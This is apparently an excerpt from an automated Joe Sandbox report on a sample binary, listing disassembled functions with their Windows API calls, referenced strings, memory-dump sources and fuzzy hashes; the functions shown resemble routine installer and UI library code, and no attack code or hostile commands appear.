                                                                                      • Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
                                                                                      Function 0048FAD8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0048FAE8
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048FAF5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048FB02
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                      • API String ID: 667068680-2254406584
                                                                                      • Opcode ID: 06817d94493c4b11f4ceaf649244f67311709392a4fb54af9b6a7fbece0388f4
                                                                                      • Instruction ID: 57668858e8c0b0289ac4f884962ff5c073460ec000cf1e14312be6c8289e998d
                                                                                      • Opcode Fuzzy Hash: 06817d94493c4b11f4ceaf649244f67311709392a4fb54af9b6a7fbece0388f4
                                                                                      • Instruction Fuzzy Hash: 1BF0F652B41B1466D620357A8CA2E7FA1CDCB95770F140937BE04A7382E95DAC0E43BD
                                                                                      Function 0045BD64 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045BD6D
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045BD7D
                                                                                      • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045BD8D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                      • API String ID: 190572456-212574377
                                                                                      • Opcode ID: e6e2d7970eb20b2f2d3a2813d8870e9f0062fcf45f3e9ec5bea086149b4b188d
                                                                                      • Instruction ID: 56c68a15e36e3577f8296096390340765d2f33f8892a2948cb77f36bf455d425
                                                                                      • Opcode Fuzzy Hash: e6e2d7970eb20b2f2d3a2813d8870e9f0062fcf45f3e9ec5bea086149b4b188d
                                                                                      • Instruction Fuzzy Hash: 55F01DB2D18700DADB04DF32AC8176236A5E768316F14803BAA45562A2D77C084CCB5C
                                                                                      Function 0044C210 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044EABD), ref: 0044C21F
                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C230
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C240
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                      • API String ID: 2238633743-1050967733
                                                                                      • Opcode ID: 070ab4bd4afa3ae6b6d67b7cdbce7e38f91889c9ccd0faa5c964c3c5c3461b15
                                                                                      • Instruction ID: 433fed67622e38403ad12c2b69c23a269c66bc576510ece0f105dc57e33200d4
                                                                                      • Opcode Fuzzy Hash: 070ab4bd4afa3ae6b6d67b7cdbce7e38f91889c9ccd0faa5c964c3c5c3461b15
                                                                                      • Instruction Fuzzy Hash: 76F0FEB0A427018AEB50ABF5DDC57123294F32070CF1951BBA001561A1C7FE5588CA2D
                                                                                      Function 0042E754 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 20libraryloaderwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0049036E,QueryCancelAutoPlay,0049324C), ref: 0042E76A
                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
                                                                                      • InterlockedExchange.KERNEL32(00496660,00000001), ref: 0042E781
                                                                                      • ChangeWindowMessageFilter.USER32(0000C199,00000001), ref: 0042E792
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                      • API String ID: 1365377179-2498399450
                                                                                      • Opcode ID: fa00e12cc4cdf4861ecf6d36c6a3bf7660c016f9e535c548e0154396b519efb6
                                                                                      • Instruction ID: 0b0503ffc39751afc322a6ee3a4e58809baba8ea613a81ff3af562a8b1a90306
                                                                                      • Opcode Fuzzy Hash: fa00e12cc4cdf4861ecf6d36c6a3bf7660c016f9e535c548e0154396b519efb6
                                                                                      • Instruction Fuzzy Hash: 7FE0ECA1741310EAEA207BA27D8AF5A39949764715F51403BF104651E2C6BD0C40C91C
                                                                                      Function 00474088 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 14libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00493242), ref: 0047408E
                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047409B
                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004740AB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                      • API String ID: 667068680-222143506
                                                                                      • Opcode ID: 5eed5f223692949adde618fed31680a65b1dac78b626770854a6ad78c0fe1b78
                                                                                      • Instruction ID: 0d19a0d9c31f114b981f83037a23f21ddb5836e87f543a540fedd059151603c0
                                                                                      • Opcode Fuzzy Hash: 5eed5f223692949adde618fed31680a65b1dac78b626770854a6ad78c0fe1b78
                                                                                      • Instruction Fuzzy Hash: B0C0C9E1285780EDAA00A7B11CC29B72548C590B29720813B7148792D2D67C0808CF2C
                                                                                      Function 0041B5DC Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B6B5
                                                                                      • 73A0A570.USER32(?), ref: 0041B6C1
                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 3731147114-0
                                                                                      • Opcode ID: 07ef95a0fb610648cfd8636f7bb4d0994a53704ba577931f4d82accc70482d19
                                                                                      • Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
                                                                                      • Opcode Fuzzy Hash: 07ef95a0fb610648cfd8636f7bb4d0994a53704ba577931f4d82accc70482d19
                                                                                      • Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
                                                                                      Function 0041B8AC Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B987
                                                                                      • 73A0A570.USER32(?), ref: 0041B993
                                                                                      • 73A08830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
                                                                                      • 73A022A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
                                                                                      • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
                                                                                      • 73A08830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A08830$A022A16310A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 3731147114-0
                                                                                      • Opcode ID: 6e3cb66e1f03a8473b81b7a24d1d9b736a83310d04235b0cfb06a94d2ee0ce24
                                                                                      • Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
                                                                                      • Opcode Fuzzy Hash: 6e3cb66e1f03a8473b81b7a24d1d9b736a83310d04235b0cfb06a94d2ee0ce24
                                                                                      • Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
                                                                                      Function 0041B478 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFocus.USER32 ref: 0041B4EE
                                                                                      • 73A0A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
                                                                                      • 73A14620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
                                                                                      • 73A0A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: E680$A14620A480A570Focus
                                                                                      • String ID:
                                                                                      • API String ID: 932946509-0
                                                                                      • Opcode ID: dffe9a4686f16107f5e26edd6f51779d739af283e940a3615cd9a04b614b528f
                                                                                      • Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
                                                                                      • Opcode Fuzzy Hash: dffe9a4686f16107f5e26edd6f51779d739af283e940a3615cd9a04b614b528f
                                                                                      • Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
                                                                                      Function 0045B728 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B793
                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B860,?,00000000,0045B7F4,?,?,?,?,00000000), ref: 0045B7D2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast
                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                      • API String ID: 1452528299-1580325520
                                                                                      • Opcode ID: c7af221143c3757ba6277ed71e4eb1831b258c6f2836e0d3f8732b0bdbf4d2ee
                                                                                      • Instruction ID: e717c2d1a7dc230ecc2a2e6fa1343dbc2c1f959998bf22c76ea0b4b3804cf210
                                                                                      • Opcode Fuzzy Hash: c7af221143c3757ba6277ed71e4eb1831b258c6f2836e0d3f8732b0bdbf4d2ee
                                                                                      • Instruction Fuzzy Hash: 59117835204608AFDB11EAA2C941B6A76ADD788306F608077AD0456783D77C5F0A959D
                                                                                      Function 0041BCFC Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BD45
                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
                                                                                      • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
                                                                                      • 73A14620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
                                                                                      • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
                                                                                      • 73A0A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A14620MetricsSystem$A480A570
                                                                                      • String ID:
                                                                                      • API String ID: 1130675633-0
                                                                                      • Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                                      • Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
                                                                                      • Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
                                                                                      • Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
                                                                                      Function 00479270 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047927E
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,00468BAA), ref: 004792A4
                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 004792B4
                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 004792D5
                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 004792E9
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00479305
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$Show
                                                                                      • String ID:
                                                                                      • API String ID: 3609083571-0
                                                                                      • Opcode ID: 037c1e32dd2642cc50d0277f9f736c0c320296323ac053b412311dd49e28eafc
                                                                                      • Instruction ID: 4d45455b4d1dd4b2c508ae6452d3c78deeda3d3e7450a597efbdbc1d096824fd
                                                                                      • Opcode Fuzzy Hash: 037c1e32dd2642cc50d0277f9f736c0c320296323ac053b412311dd49e28eafc
                                                                                      • Instruction Fuzzy Hash: B9015EB5641310ABD700E768DD81F263B98AB1E330F0606AAB959DF3E7C639DC048B18
                                                                                      Function 0041B1E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B1EC
                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B1FE
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B221
                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B22C
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B247
                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B252
                                                                                        • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                      • String ID:
                                                                                      • API String ID: 3527656728-0
                                                                                      • Opcode ID: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                      • Instruction ID: 2be34f36c4bf399c8fa5e8a938e63ded300dcfd20fe04f8c9e05bbd916d2a40e
                                                                                      • Opcode Fuzzy Hash: af92fd76f0ea33d52ebd072e8e43ea1c00ff5cbe0803c9f3aa53dd55169beb2c
                                                                                      • Instruction Fuzzy Hash: 84F0BFB1511101ABCE00FFBAD9CAE4B27A89F443097048057B944DF19BC63CDC504B3E
                                                                                      Function 00472460 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 004724B6
                                                                                      • 73A159E0.USER32(00000000,000000FC,00472414,00000000,00472646,?,00000000,0047266B), ref: 004724DD
                                                                                      • GetACP.KERNEL32(00000000,00472646,?,00000000,0047266B), ref: 0047251A
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00472560
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: A159ClassInfoMessageSend
                                                                                      • String ID: COMBOBOX
                                                                                      • API String ID: 3375322265-1136563877
                                                                                      • Opcode ID: 2494eb77be1e0edaf4ac2089fb308deb96536dac66c833c5e7946f84bffa6ab9
                                                                                      • Instruction ID: cb5c9aae2de1f6f31ba47a78a2c89e9f0e2bb96aecd870e4ce07d9e094be5fb6
                                                                                      • Opcode Fuzzy Hash: 2494eb77be1e0edaf4ac2089fb308deb96536dac66c833c5e7946f84bffa6ab9
                                                                                      • Instruction Fuzzy Hash: F4514F74A04205AFC710DF65DA85EDAB7F5EB49304F1581BBF808AB3A2C778AD41CB58
                                                                                      Function 004924B8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                                      • ShowWindow.USER32(?,00000005,00000000,0049271D,?,?,00000000), ref: 004924EE
                                                                                        • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                                        • Part of subcall function 00407210: SetCurrentDirectoryA.KERNEL32(00000000,?,00492516,00000000,004926E9,?,?,00000005,00000000,0049271D,?,?,00000000), ref: 0040721B
                                                                                        • Part of subcall function 0042D328: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D3B6,?,?,00000000,?,?,00492520,00000000,004926E9,?,?,00000005), ref: 0042D35D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                      • API String ID: 3312786188-1660910688
                                                                                      • Opcode ID: d8b767a4e34b569ce73df8f101cabac2d674949f6b0fce57bb6887b20208c213
                                                                                      • Instruction ID: 355638249edcb87860175999b9826d121cd81d9e81ad854bfd2fce74e3c3dc59
                                                                                      • Opcode Fuzzy Hash: d8b767a4e34b569ce73df8f101cabac2d674949f6b0fce57bb6887b20208c213
                                                                                      • Instruction Fuzzy Hash: 08317534A10204AFCB01FFA5DD5299E7FB5EB49304F91847AF400A7752CB78AD01CB98
                                                                                      Function 0048D6E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001,?,?,0047E34F,?,00000001,00000000), ref: 0042DC70
                                                                                      • RegCloseKey.ADVAPI32(?,0048D7DE,?,?,00000001,00000000,00000000,0048D7F9), ref: 0048D7C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
